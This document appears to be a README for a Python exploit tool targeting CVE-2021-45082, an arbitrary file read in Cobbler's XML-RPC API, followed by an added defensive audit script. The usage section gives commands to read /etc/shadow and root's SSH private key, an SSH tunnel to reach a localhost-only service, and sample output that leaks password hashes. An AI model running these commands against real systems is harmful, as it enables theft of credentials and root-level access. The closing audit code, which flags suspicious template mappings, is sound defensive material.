A Python exploit tool for reading arbitrary files through Cobbler's XML-RPC API vulnerability. This tool leverages improper input validation in Cobbler's template_files feature to read sensitive files with root privileges.
Cobbler is a Linux installation server that allows for rapid setup of network installation environments. This exploit targets a vulnerability in Cobbler's XML-RPC API (typically running on port 25151) where the template_files mapping feature doesn't properly validate file paths, allowing authenticated users to read arbitrary files on the system.
- CVE ID: CVE-2021-45082
- Affected Component: Cobbler < 3.3.1
- Vulnerability Type: Arbitrary File Read / Path Traversal
- Required Access: Authenticated access to Cobbler API (or unauthenticated if misconfigured)
- Impact: Read any file on the system with root privileges
- CVSS Score: High (Information Disclosure leading to Privilege Escalation)
FOR EDUCATIONAL PURPOSES ONLY
This tool is provided for educational purposes and authorized penetration testing only. Unauthorized access to computer systems is illegal. The author assumes no liability for misuse of this tool.
Only use this tool on:
- Systems you own
- Systems you have explicit written permission to test
- Authorized CTF/Lab environments (like Hack The Box)
- Python 3.x
- xmlrpc.client (built-in)
- Network access to Cobbler XML-RPC API (port 25151)
- SSH access for port forwarding (if service is localhost-only)
# Read a specific file
python3 CVE-2021-45082.py /etc/shadow
# Read root's SSH private key
python3 CVE-2021-45082.py /root/.ssh/id_rsa
If Cobbler API is only accessible on localhost (127.0.0.1:25151):
# In Terminal 1: Establish SSH tunnel
ssh -L 25151:127.0.0.1:25151 user@target-host
# In Terminal 2: Run the exploit
python3 CVE-2021-45082.py /etc/shadow
# Run without arguments for interactive mode
python3 CVE-2021-45082.py
# You'll be prompted:
# [?] Enter file path to read (e.g., /etc/shadow):
$ python3 CVE-2021-45082.py /etc/shadow
============================================================
Cobbler Arbitrary File Read Exploit
============================================================
[*] Target file: /etc/shadow
[*] Connecting to Cobbler API...
[*] Logging in...
[*] Creating fake distribution...
[*] Creating fake profile...
[*] Mapping /etc/shadow -> /leak
[*] Syncing...
[+] Exploit setup complete!
============================================================
FILE: /etc/shadow
============================================================
root:$6$xyz...:19234:0:99999:7:::
daemon:*:19234:0:99999:7:::
...
============================================================
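
For defenders, the `/etc/shadow -> /leak` mapping in the output above is the artifact to hunt for: a `template_files` entry whose source lies outside the template directory. The following audit is an added example, not part of this tool or of Cobbler; `ALLOWED_ROOTS` and the sample records are assumptions/constructed data, and `audit_server` relies on Cobbler's `get_distros`, `get_profiles` and `get_systems` XML-RPC listing calls.

```python
import posixpath
import xmlrpc.client

# Assumption: the only directory legitimate template sources live in.
ALLOWED_ROOTS = ("/var/lib/cobbler/templates",)

def is_allowed(source, roots=ALLOWED_ROOTS):
    """True if the normalized source path is inside an allowed root."""
    path = posixpath.normpath(source)  # collapses ../ sequences
    return any(path == r or path.startswith(r + "/") for r in roots)

def audit_items(kind, items, roots=ALLOWED_ROOTS):
    """Return (kind, name, source, dest) for every out-of-root mapping."""
    findings = []
    for item in items:
        mapping = item.get("template_files")
        if not isinstance(mapping, dict):  # "<<inherit>>" or unset
            continue
        for source, dest in mapping.items():
            if not is_allowed(str(source), roots):
                findings.append((kind, item.get("name", "?"), str(source), str(dest)))
    return findings

def audit_server(url="http://127.0.0.1:25151"):
    """Pull distros, profiles and systems from a live server and audit them."""
    server = xmlrpc.client.ServerProxy(url)
    getters = (("distro", server.get_distros),
               ("profile", server.get_profiles),
               ("system", server.get_systems))
    findings = []
    for kind, getter in getters:
        findings += audit_items(kind, getter())
    return findings

# Constructed sample records shaped like Cobbler profile dictionaries.
SAMPLE_PROFILES = [
    {"name": "web-base",
     "template_files": {"/var/lib/cobbler/templates/motd.template": "/etc/motd"}},
    {"name": "lab-test", "template_files": {"/etc/shadow": "/leak"}},
    {"name": "traversal",
     "template_files": {"/var/lib/cobbler/templates/../../../../etc/passwd": "/x"}},
    {"name": "inherits", "template_files": "<<inherit>>"},
]

if __name__ == "__main__":
    for kind, name, source, dest in audit_items("profile", SAMPLE_PROFILES):
        print(f"[!] {kind} {name}: {source} -> {dest}")
```

Objects flagged here that nobody on the provisioning team created are worth correlating with Cobbler's logs and with recent API logins.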